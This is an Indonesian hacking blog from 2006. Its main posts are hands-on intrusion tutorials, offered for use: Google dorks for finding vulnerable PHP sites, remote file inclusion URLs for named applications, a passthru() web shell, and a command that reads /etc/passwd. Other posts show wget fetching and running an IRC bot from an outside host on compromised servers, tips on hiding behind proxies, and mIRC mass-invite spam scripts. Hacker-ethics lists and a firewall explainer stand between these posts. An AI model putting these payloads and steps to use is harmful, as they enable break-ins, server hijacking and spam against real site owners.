Tuesday, February 14, 2006

Hacking Ethical

HACKING ETHICALS ARE :

Above all else, do no harm.

Do not damage computers or data if at all possible. Much like the key element of the Hippocratic Oath.

Hacking is a quest for knowledge; there is no intrinsic need or desire to destroy. But it is generally held that system-cracking for fun and exploration is ethically OK as long as the cracker commits no theft, vandalism, or breach of confidentiality. However, accidents and pranks that hackers view as harmless may cause the victims to lose time and effort.

Protect privacy.

This is typically reconciled with the free information ethos by separating public information from private. How the line is drawn is, of course, a question of personal (and political) views.

Waste not, want not.

Computer resources should not lie idle and wasted. Using idle time and perhaps leaving suggestions for improved performance is seen as a favor.

Exceed limitations.

"Telling a hacker something can´t be done, is a moral imperative for him to try."

The communicational imperative.

Communicating with and associating with peers is a fundamental human right. Some see it as strong enough to motivate violation of laws and regulations.

Leave no traces.

Keeping quiet about your exploits is not only for your protection. It also helps other hackers avoid getting caught or losing access.

Share!

Information increases in value by sharing it with other people. Data can be the basis for someone else´s learning; software can be improved collectively.

Fight cyber-tyranny.

Hacking is necessary to help protect the world from dystopian development of global information systems a la 1984.

Trust, but test.

By engaging hands-on with technical and social systems, your discoveries can contribute to improving the systems.

Monday, February 13, 2006

Lirik MySQL lewat PhpInjection

Pada kesempatan lalu kita sudah bisa mencari target dan mendapatkannya. Abis itu dari pada di deface kita sudah menanam psybnc ato bot di dalamnya. Pada kesempatan kali ini saya akan memberikan sedikit tutor gimana yach klo jalan-jalan di dalam server itu sejenak.Enaknya khan kita bisa tau databasenya.Baiklah kita mulai tutor kita kali ini.
1. Inget aturan nomor satu sebelum memulai semuanya. Jangan lupa kompi udah terhubung dulu ke internet.
2. Nah duduk di depan kompi ... hmmm apa yang kurang yach ....Oh iya jangan lupa ROkok dan Kopi.
3. Setelah semua siap. Nah kita mulai dech.
4. Liat artikel PhpInjection, disitu kita sudah dapet target.Contoh:
-= http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd =-
Nah kmu ganti dech di address barnya jadi :
http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/antri?&cmd

Nah Nongol dech tuh isi database nya. Hmm udah dapet listnya enaknya kita ngapain lagi yach.hehehhe ....

Klo ndak jalan berarti database nya bukan SQL atau mungkin Server database nya pisah sama webserver nya.
Nah cobain lagi dech cari target lain

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Sunday, February 12, 2006

Membuat Eggdrop lewat PhpInjection

Pada artikel saya yang terakhir saya menulis tentang bagaimana melakukan Injection lewat script php.Pada kesempatan ini kita akan membuat Eggdrop pada PhpInjection yang kita buat.
Nah mending kita langsung ajah. Nah kamu tinggal masukkin dech di address bar:

http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd

1. Kamu cari folder mana yang bisa kamu masuki dengan cara find /-perm 777 -type d
Atau kalo nggak mau repot langsung aja kamu wget di /var/tmp atau /tmp

2. Nah wget dech bot nya di :

ketik : wget http://www.geocities.com/k4k3_rgb/bot/linux.tgz

3. nah setelah itu kamu ekstrak :

ketik : tar -zxvf linux.tgz
misal : [januar@server tmp]$ tar -zxvf linux.tgz

4. Abis itu masuk dech ke directory .linux. Nah setelah berada pada directory .linux kamu ketik :

[januar@server .linux]$ ./nadya

maka akan keluar command seperti berikut :

Cara Penggunaan :

./nadya pr1 pr2 pr3 pr4 pr5 pr6

pr1 = nama file conf yg akan dibuat
pr2 = nick
pr3 = ident
pr4 = IP
pr5 = nama channel (jangan pake #)
pr6 = nick owner

[januar@server .linux]$

Nah bikin dech bot sesuai keinginan kmu.
Contoh : ./nadya botk4k3 botk4k3 CrewK4k3 (ip tuh server) hackcrew k4k3

[januar@server .linux]$ ./nadya botk4k3 botk4k3 hackcrew 192.168.21.21 hackcrew k4k3

5. Nah setelah keluar perintah berikut :

Config file : botk4k3
set nick "botk4k3"
set username "hackcrew"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set basechan "#hackcrew"
set owner "k4k3"
cat: kinana.conf: No such file or directory

ketik: ./eggdrop -m botk4k3 untuk menjalankan bot anda

Thanks to k4k3 for his idea, You Are My Teacher !!!

maka ketikanlah :
./eggdrop -m botk4k3

contoh : [januar@server .linux]$ ./eggdrop -m botk4k3

6. Nah selesai dech bikin botnya.Kamu tinggal tunggu dech di channel kmu. Trus sapa dech botnya.
ketik: /msg botk4k3 hello

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Sumber : http://semparuk.mynew.ws/news.php

Php Injection (updated every day)

Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.

1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums

Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/k4k3_rgb/list.txt =-

4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :

1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.

6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.

Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:

passthru($test);
?>

simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.

Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal

jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30


7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]

8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd

Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Thanks to,
#hackcrew, #binushacker, #kampunghacker, #batamhacker, #yogyafree dan semua pihak yang tidak bisa di sebut kan satu persatu.
Sumber :
Pengalaman Pribadi penulis
-= http://www.jasakom.com/article.aspx?ID=517 =-
-= http://www.clemens-fatek.com =-
-= http://www.yogyafree.net =-
-= http://www.hitam-putih.com =-

Saturday, February 11, 2006

Etika 'Hackers'

Seorang 'Hackers' juga punya etika, kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.

Kode etik hacker tersebut tertulis:
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali.
2. Segala informasi haruslah gratis.
3. Jangan percaya pada otoritas, promosikanlah desentralisasi.
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer.
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

Manifesto 'Hackers'

Manifesto Hacker dibuat oleh seorang hacker yang menggunakan nickname The Mentor dan
pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Manifesto Hacker tersebut adalah:
1. Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
2. Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
3. Kami menjelajah, dan kalian sebut kami kriminal.
4. Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
5. Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
6. Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
7. Ya, aku memang seorang kriminal.
8. Kejahatanku adalah rasa keingintahuanku.
9. Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
10. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
11. Aku memang seorang hacker, dan inilah manifesto saya.
12 Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
13. Bagaimanapun juga, kami semua senasib seperjuangan.

Terima Kasih kepada ^family_code^ atas bimbingan dan pengajaran. Terima kasih pada kawan - kawan seperjuangan.Semoga ini menjadi pegangan dan ikatan kita.

Friday, February 10, 2006

Karikatur Nabi Muhammad

Beberapa hari ini semua orang membicarakan dan meributkan dengan masalah salah satu media denmark yang membuat karikatur yang disebut-sebut menjelekkan Nabi Muhammad.

Sejauh ini telah menyebabkan begitu banyak Kedutaan besar di Negara - negara Islam di protes dan beberapa diantaranya di bakar.Bahkan di Indonesia hal serupa terjadi di Jakarta dan Surabaya.

Mungkin kawan-kawan sekalian penasaran apa yang diributkan oleh orang banyak.Berikut ini saya berikan linknya.

-= http://www.muhammadcartoons.com =-

Rupanya hal ini malah memancing banyak reaksi negatif juga di dunia 'maya'.Hal ini malah membawa ke bentuk provokasi. Begitu banyak website yang muncul pasca kejadian tersebut; salah satunya situs berikut ini:

-= http://www.muhammadcartoons.com/ =-

Nah silahkan dech kalian melihatnya dan mencoba menilai bagaimana????
Jawaban ada pada anda sendiri dan biarlah itu menjadi bagian penilaian pada diri anda sendiri.
Saya disini tidak mau memihak maupun meributkan dan apalagi berusaha menghasut.Tapi saya hanya berharap hal seperti ini tidak pernah terjadi lagi. Biarkanlah kita tetap tenang dan tidak terhasut oleh semua tindakan yang berusaha menghancurkan manusia dengan memecah-mecahnya.

Penulis tidak bertanggung jawab atas tindakan yang dilakukan karena membaca tulisan ini. Tulisan ini hanyalah sebagai informasi.

Sunday, February 05, 2006

Membuat Eggdrop NetGate pada shell

Selama ini pada saat saya Chatting di IRC.Dal.Net, banyak orang selalu bertanya dan memohon bantuan pada saya untuk membuat Bot atau PsyBNC pada shell mereka. Cukup banyak sudah orang yang mendapatkan pengajaran dari saya. Nah pada kesempatan ini saya akan berbagi sedikit bersama kawan semua untuk memberikan Tutor sedikit bagaimana membuat Eggdrop pada shell. Dalam hal ini shell pada sistem operasi linux.
Nah mari kita mulai Tutor kita kali ini:

1. Nah seperti biasanya sebelum kita memulai sesuatu marilah kita menyiapkan diri kita agar dapat bekerja dengan baik.
2. Jangan lupa untuk menyalakan rokok dan minum segelas kopi hangat agar diri kita tetap santai dalam melakukan segala sesuatunya.
3. Hmm...setelah anda santai dan rileks barulah kita bisa memulai nya.
4. Pertama kali ambillah eggdrop yang kita inginkan pada situs kesayangan kita, atau dalam hal ini kita akan ambil eggdrop keluaran Netgate pada http://geocities.com/kake_rgb/bot/eggdrop.tgz. Nah cara mengambil terserah pada anda. Salah satu alternatif adalah dengan mendownload dulu file eggdrop ke kompi anda, lalu setelah itu dengan menggunakan layanan ftp pada shell anda maka anda tinggal menaruh file eggdrop pada shell anda. Alternatif lain adalah jika anda menggunakan sistem operasi linux pada shell anda maka anda dapat mendownload secara langsung dengan menggunakan fasilitas layanan, Misal : wget http://geocities.com/kake_rgb/bot/eggdrop.tgz.
5. Nah setelah kita sudah mendapatkan file eggdrop.tgz pada shell anda barulah kita melakukan ekstrak pada file tersebut. Untuk melakukannya kita tinggal mengetikkan : tar -zxvf . Dalam kasus ini adalah : tar -zxvf eggdrop.tgz. Nah setelah terekstrak maka anda akan menemukan sebuah directory eggdrop.
6. Lalu akses lah direktory tersebut dengan mengetikkan : cd eggdrop
7. Setelah kita berada pada direktori eggdrop. Maka kita akan disuguhkan beberapa file dan direktori untuk membuat bot netgate tersebut, sebagai berikut:

[januar@server eggdrop]$ ls
doc filesys language lokasi.csv scripts start xh
eggdrop help logs README setting.conf text
[januar@server eggdrop]$

8. File setting.conf : adalah merupakan file utama konfigurasi yang akan digunakan.Nah untuk menjalankannya ketik : ./start
Maka akan tampil sebagai berikut:

[januar@server eggdrop]$ ./start

#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################

Cara Penggunaan:

./start ""

filename = nama file konfigurasi
nick = nama nick untuk bot
ident = ident untuk bot
ip = alamat IP yang digunakan (numeric)
fullname = fullname untuk bot, gunakan petik untuk lebih dari 1 kata
channel = channel bot untuk join (tanpa karakter #)
owner = nick untuk owner

[januar@server eggdrop]$

9. Nah untuk membuat bot kita cukup ikuti sesuai petunjuk. Misal aku ingin bikin file konfigurasi sebagai berikut :

[januar@server eggdrop]$ ./start botk4k3 botk4k3 Crewk4k3 192.168.21.21 "Bot milik k4k3" hackcrew k4k3

Maka akan ditampilkan menu:

#########################################
## Eggdrop File Config Generator 1.0 ##
## Created by MAXFIDER ##
## eggdrop@maxfider.com ##
#########################################

File konfigurasi : botk4k3
set nick "botk4k3"
set username "Crewk4k3"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set realname "Bot milik k4k3"
set basechan "#hackcrew"
set owner "k4k3"

------------------------------------
File konfigurasi berhasil dibuat !!!
------------------------------------
Langkah berikutnya, pilihlah salah satu menu berikut:
(1) Jalankan eggdrop dengan menyamarkan nama program
(2) Jalankan eggdrop dengan nama asli
(3) Keluar dari program ini

Masukkan pilihan [1|2|3]:

jika itu shell anda sendiri maka pilihlah no 2.Ketik kan angka : 2
Jika semua berjalan lancar maka akan ditampilkan menu sebagai berikut :

STARTING BOT IN USERFILE CREATION MODE.
Telnet to the bot and enter 'NEW' as your nickname.
OR go to IRC and type: /msg botk4k3 hello
This will make the bot recognize you as the master.

[19:50] === botk4k3: 0 channels, 0 users.
Launched into the background (pid: 6460)

setelah itu tunggulah bot anda di channel anda dan sapa lah ia dengan mengetik :
/msg botk4k3 hello
Maka dia akan mengenali anda sebagai owner nya. Jangan lupa setting passwd dan bacalah keterangannya dengan mengetik /msg botk4k3 help

Nah selamat mengkonfigurasi bot anda.
Untuk jenis bot Netgate lain tinggal menyesuaikan saja.Ikuti saja keterangan yang ada, saya rasa cukup mudah.Terima kasih atas perhatiannya.
Demikian lah artikel ini dibuat untuk menjadi pengetahuan bagi anda.Segala tindakan yang dilakukan karena membaca artikel ini bukan merupakan tanggung jawab penulis.

Saturday, February 04, 2006

Si Tembok Api;

Apa itu Firewall...

Fungsi firewall dalam dunia komputer adalah berfungsi mencegah malware menyebar ke tempat lain dan mencegah malware masuk ke komputer.
Firewall boleh dibilang adalah suatu perangkat, baik lunak maupun keras yang menyaring informasi yang datang dari internet ke komputer. Jika paket informasi yang datang ditandai oleh filter, maka paket tidak boleh lewat. Firewal diposisikan berada antara internet dan komputer.

Firewall menggunakan salah satu atau kombinasi dari 3 metode untuk mengontrol lalu lintas di jaringan. Metode metode itu adalah penyaringan paket (packet filtering), layanan proksi (proxy service) dan penyelidikan berdasarkan bagian tertentu dari packet (statefull inspection).

Packet filtering.
Dalam jaringan. internet, data dipilah menjadi beberapa paket dan dikirimkan secara simultan. metode penyaringan paket ini menganalisis paket berdasarkan filter tertentu. Paket yang aman dibiarkan berlenggang ke sistem yang membutuhkan. Dan yang lainnya ditahan.

Proxy Service.
Metode ini membuat firewall mengamankan informasi dari internet dan mengirimkannya ke komputer yang meminta informasi itu.

Stateful Infection.
Dengan menggunakan metode ini, firewall tidak memeriksa setiap paket tapi membandingkan bagian tertentu dari paket dengan basis data tang berisi informasi yang dapat dipercaya. Informasi yang berjalan-jalan di dalam firewall ke luar dimonitor untuk menentukan karakteristiknya. Kemudian informasi yang masuk dibandingkan dengan karakteristik itu.

Penyaring.
Firewall dapat dikostumasi yang berarti seseorang dapat menambah dan menghapus filter berdasarkan kondisi tertentu. Berikut ini adalah beberapa penyaring yang bisa ditambah atau dihapus.
1. Alamat IP
Setiap komputer yang terhubung ke internet pasti memiliki alamat Ip yang berupa nomor 32 bit. 216.27.61.137 adalah contoh alamat IP. Firewall bisa memblok lalu lintas komputer dengan alamat IP tertentu. Kalau sudah begitu, data tidak bisa datang atau pergi dari komputer yang alamat IP-nya sudah di blok.
2. Nama Domain.
Sulit toh mengingat alamat IP. Makanya sebagai ganti alamat IP, diciptakan nama domain yang lebih mudah dibaca oleh manusia. Contoh nama domain adalah www.jasakom.com. Firewall dapat digunakan untuk menutup akses ke suatu domain tertentu atau mengarahkan komputer agar cuma bisa ke domain tertentu.
3. Protokol.
Protokol adalah suatu cara agar seseorang yang hendak menggunakan suatu layanan dapat "berbicara" dengan layanan itu. Protokol menggambarkan cara klien dan server berkomunikasi.
Beberapa protokol yang dapat digunakan firewall sebagai penyaring adalah:
* IP (Internet Protocol) mengatur informasi di Internet.
* TCP ( Transmission Control Protocol) memecah dan membangun kembali informasi yang berjalan di Internet.
* HTTP (Hypertext Transfer Protocol) mengatur halama situs Web.
* FTP (File Transfer Protocol) digunakan untuk mengunduh dan memasukkan file.
* UDP (User Datagram Protocol) digunakan untuk informasi yang tidak membutuhkan respons seperti streaming suara dan video.
* ICMP (Internet Control Message Protocol) digunakan oleh router untuk bertukar informasi dengan router lain.
* SMTP (Simple Mail Transport Protocol) digunakan untuk mengirim email.
* SNMP (Simple Network Management Protocol) digunakan untuk mengumpulkan informasi sistem dari suatu komputer yang dikendalikan dari jarak jauh.
* Telnet digunakan untuk memberikan perintah kepada komputer yang dikendalikan jarak jauh.
4. Port.
Layanan dari server bisa diakses melalui sejumlah port. Satu port untuk satu layanan. Misal, server membuka layanan FTP yang ada di port 21. Firewall bisa memblok port itu agar orang tidak bisa mengunduh atau memasukkan file.
5. Kata atau Frasa Spesifik.
Firewall akan mengendus setiap paket informasi untuk mencari kata atau frasa yang sama persis dengan yang sudah diatur di Firewall. Persis disini tidak main-main, tapi betul-betul persis. Misal kata yang dimasukkan adalah "film-XXX". Andai dalam paket terdapat frasa "film-XXX", maka paket itu akan boleh dilewatkan.

Sumber : majalah PC+ januari, 2006

Tuesday, January 31, 2006

Super Inviter IRC

Berikut ini Saya akan berikan beberapa tips & trik serta sedikit tutor untuk membuat Super Inviter ala anak-anak jasakom.
Gunakanlah ini untuk kebaikan, walau daku tidak menggunakannya. Namun ini sudah di coba kawan-kawan di jasakom.

1. Expert Inviter (Anti Banned) by CyberMad, kecuali oleh IRC Cop.
Cara kerjanya adalah mIRC 1 (Spy) mencatat data nick yang join ke suatu channel ke InviteList.txt pada folder Data. Lalu mIRC 2 (Inviter) mengambil data nick, lalu mengirim pesan invite. Bila nick tersebut OP, Voice, Quit, ganti Nick, error Nick akan segera di delete nicknya. Pastikan menggunakan 2 IP berbeda.

Berikut ini script pada mIRC 1 yang bertugas sebagai spy / mata-mata. Pastikan anda sudah membuat folder Data pada direktori mIRC.

[ REMOTE ]
#ExpertInvite off
on 1:join:#: {
if ($nick == $me) { halt } | else { set %nick $nick | write Data/InviteList.txt %nick }
}
on 1:op:#: {
write -dw* $+ $opnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $opnick $+ _12) stoped! They were oped in (_1 $+ $chan $+ _12)
}
on 1:voice:#: {
write -dw* $+ $vnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $vnick $+ _12) stoped! They were voiced in (_1 $+ $chan $+ _12)
}
on 1:quit: {
if ($nick == me) { halt } | else { write -dl1 Data/InviteList.txt | echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They quit IRC }
write -dw* $+ $nick $+ * InviteList.txt
}
on 1:nick: {
write -dw* $+ $nick $+ * Data/InviteList.txt
write Data/InviteList.txt $newnick
echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They changed there nickname to (_1 $+ $newnick $+ _12)
}
raw 401:*: {
write -dw* $+ $2 $+ * Data/InviteList.txt
echo -a * __7E__12rror sending invite to (_1 $+ $2 $+ _12) aborting
}
#ExpertInvite end

[POPUP-menubar]
Expert
.Start Spy:/enable #ExpertInvite
.Stop Spy:/disable #ExpertInvite

Berikut ini script pada mIRC 2 yang bertugas sebagai Inviter.
[REMOTE]
on 1:START: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]
on 1:CONNECT: titlebar .:: MadCodes Script ::. OnLine [[ %InvitedPeople people invited ]]
on 1:DISCONNECT: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]

[POPUP-menubar]
Start Invite:/StartInvite
Stop Invite:/timerInvite off
-
Set Message:/set %ExpertInviter.Message $$?="Message"

[ALIASES]
/StartInvite /timerInvite 0 5 /gabung
/gabung /set %invite $read -l1 ../Data/InviteList.txt | msg %invite %ExpertInviter.Message | inc %InvitedPeople | write -dl1 ../Data/InviteList.txt


2. Advanced Inviter

Tipe inviter satu ini hampir mirip dengan xGuest, tetapi kelebihan yang satu ini adalah OpenSource dan langsung di mIRC hehehe. Jadi dapat lu kembangkan menjadi lebih baik.

Save script dibawah dengan nama massinviteoke.mrc di folder mIRC, lalu load file tersebut dari mIRC.

Credit: Script untuk Advanced Inviter (massinviteoke.mrc) bukan buatan saya (CyberMad), saya hanya menulis ulang disini. Sangat disayangkan... saya tidak mengetahui nama pembuat aslinya.



on 1:LOAD:/auser me $me
alias tanya {
if ( %tc == $null ) { set %tc $chan }
if ( %server = $null ) { /set %server $$?="enter SERVER" }
if ( %msg != $null ) goto msg1
:msg
/set %msg $$?=" enter message"
:msg1
//echo -a 5This is your message: %msg
/set %msgok $$?="Message okay? Y/N"
if ( %msgok == N ) { goto msg | halt }
/undang
/unset %msgok
}
alias undang {
set %tp $nopnick(%tc,0)
set %pn 1
:begin
set %p $nopnick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
alias pesan {
:mulai
inc %cunt1
if ( %cunt > %tp ) { .remove penghuni.txt | unset %tc | unset %tp | unset %pn | unset %p | unset %pn1 | unset %cunt | unset %cunt1 | /echo -s DONE! | /quit | halt }
set %p $read -l $+ %cunt penghuni.txt
set %FILTER3 $addtok(%FILTER3,%p,44)
if ($gettok(%FILTER3,0,44) == 4) { .msg $gettok(%FILTER3,1-4,44) %msg | unset %FILTER3 }
/echo -s 12 Msg sent to 4 $read -l $+ %cunt penghuni.txt 1 at 3 %tc 6 %cunt of %tp
inc %cunt
if ( %cunt1 == 51 ) { /timer 1 2 /unset %cunt1 | /timer 1 5 /quit leaving | /timer 1 7 /server %server | halt }
goto mulai
}
raw 401:*: { halt }
raw 403:*: { halt }
on 1:CONNECT: {
if ( %cunt == $null ) { halt }
/pesan
}
menu menubar {
<< G-Mass-Inviter >>
-
Join a channel (invite from this channel): /set %tc $$?="Enter channel invite from" | /join %tc
